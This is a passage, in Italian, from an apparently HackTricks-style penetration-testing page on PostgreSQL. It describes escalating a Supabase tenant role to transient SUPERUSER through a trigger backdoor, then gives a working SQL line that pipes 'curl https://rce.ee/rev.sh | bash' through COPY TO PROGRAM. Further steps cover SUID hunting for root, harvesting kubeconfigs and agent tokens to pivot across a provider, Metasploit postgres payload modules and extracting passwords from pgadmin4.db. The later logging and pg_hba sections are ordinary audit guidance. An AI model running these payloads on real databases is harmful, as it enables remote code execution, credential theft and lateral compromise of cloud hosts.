Il tentativo di Supabase di saltare gli unsafe triggers verifica solo la proprietà, quindi assicurati che il trigger function owner sia il tuo ruolo a basso privilegio, ma il payload viene eseguito solo quando l'hook imposta `current_user` su SUPERUSER. Poiché il trigger viene rieseguito su futuri DDL, funge anche da self-healing persistence backdoor ogni volta che il provider eleva temporaneamente i ruoli dei tenant.

### Trasformare un accesso SUPERUSER transitorio in compromissione dell'host

Dopo che `SET ROLE priv_esc;` ha successo, riesegui le primitive bloccate in precedenza:
```sql
INSERT INTO public.ai_models(model_name, config)
VALUES ('hostname', to_jsonb(pg_read_file('/etc/hostname', 0, 100)));
COPY (SELECT '') TO PROGRAM 'curl https://rce.ee/rev.sh | bash';

pg_read_file/COPY ... TO PROGRAM ora forniscono accesso arbitrario ai file ed esecuzione di comandi come l’account OS del database. Follow up with standard host privilege escalation:

find / -perm -4000 -type f 2>/dev/null

Sfruttando un binario SUID mal configurato o una config scrivibile si ottengono privilegi root. Una volta ottenuto root, raccogli le credenziali di orchestrazione (systemd unit env files, /etc/supabase, kubeconfigs, agent tokens) per pivot laterally attraverso la regione del provider.

POST

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

logging

All’interno del file postgresql.conf puoi abilitare i postgresql logs modificando:

log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/

Quindi, riavvia il servizio.

pgadmin

pgadmin è una piattaforma di amministrazione e sviluppo per PostgreSQL.
Puoi trovare passwords all’interno del file pgadmin4.db
Puoi decifrarle usando la funzione decrypt all’interno dello script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py

sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db

pg_hba

L’autenticazione dei client in PostgreSQL è gestita tramite un file di configurazione chiamato pg_hba.conf. Questo file contiene una serie di record, ognuno dei quali specifica un tipo di connessione, l’intervallo di indirizzi IP del client (se applicabile), il nome del database, il nome utente e il metodo di autenticazione da usare per le connessioni corrispondenti. Il primo record che corrisponde al tipo di connessione, all’indirizzo del client, al database richiesto e al nome utente viene utilizzato per l’autenticazione. Non esiste un fallback o un backup se l’autenticazione fallisce. Se nessun record corrisponde, l’accesso viene negato.

I metodi di autenticazione basati su password disponibili in pg_hba.conf sono md5, crypt, e password. Questi metodi differiscono nel modo in cui la password viene trasmessa: MD5-hashed, crypt-encrypted, o clear-text. È importante notare che il metodo crypt non può essere usato con password che sono state criptate in pg_authid.

Enumerazione locale su Linux

Con accesso shell, PostgreSQL riguarda spesso auth policy, socket access, e credential artifacts piuttosto che l’esposizione TCP diretta.

Percorsi e file ad alto segnale:

find /etc/postgresql -maxdepth 4 -type f \( -name "postgresql.conf" -o -name "pg_hba.conf" \) 2>/dev/null
ls -l /var/run/postgresql/.s.PGSQL.5432 ~/.pgpass 2>/dev/null

Impostazioni importanti e significati:

  • listen_addresses controlla a quali interfacce si lega PostgreSQL ('*' significa tutte)
  • peer mappa l’OS user locale a un DB role sulle socket UNIX
  • trust consente l’accesso senza password per le regole corrispondenti

Controlli rapidi:

rg -n "^(host|local)|trust|peer|md5|scram|password|ssl" /etc/postgresql 2>/dev/null
sudo -u postgres psql -c 'SHOW hba_file; SHOW config_file;' 2>/dev/null
sudo -u postgres psql -c '\du' 2>/dev/null

Cosa cercare:

  • trust voci al di fuori di un contesto lab/dev
  • mappature permissive peer che trasformano l’accesso OS in amministratore del DB
  • permessi deboli su ~/.pgpass
  • ruoli con SUPERUSER, CREATEDB, REPLICATION, o BYPASSRLS

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks